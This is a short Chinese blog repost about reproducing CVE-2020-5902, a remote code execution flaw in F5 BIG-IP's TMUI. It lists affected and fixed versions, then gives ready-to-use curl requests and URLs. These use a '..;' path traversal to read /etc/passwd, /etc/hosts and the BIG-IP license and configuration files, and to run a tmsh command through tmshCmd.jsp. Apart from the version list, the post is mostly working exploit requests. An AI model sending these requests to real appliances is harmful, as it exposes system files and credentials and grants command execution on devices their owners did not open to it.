码迷,mamicode.com
首页 > 其他好文 > 详细

cve-2020-5902 BIG-IP RCE漏洞复现&exp

时间:2020-07-06 11:02:00      阅读:922      评论:0      收藏:0      [点我收藏+]

标签:wechat   ace   修复方法   cal   jsp   http   漏洞   url   big-ip   

简介

BIG-IP的TMUI存在RCE漏洞

影响范围

版本号主要如下
11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x

修复方法

升级
11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4

文件读取poc

curl -v -k  ‘https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd‘

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf

技术图片

RCE poc

curl -v -k  ‘https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin‘

技术图片

参考

  1. https://twitter.com/x4ce/status/1279760648465870848

技术图片

cve-2020-5902 BIG-IP RCE漏洞复现&exp

标签:wechat   ace   修复方法   cal   jsp   http   漏洞   url   big-ip   

原文地址:https://www.cnblogs.com/potatsoSec/p/13253288.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!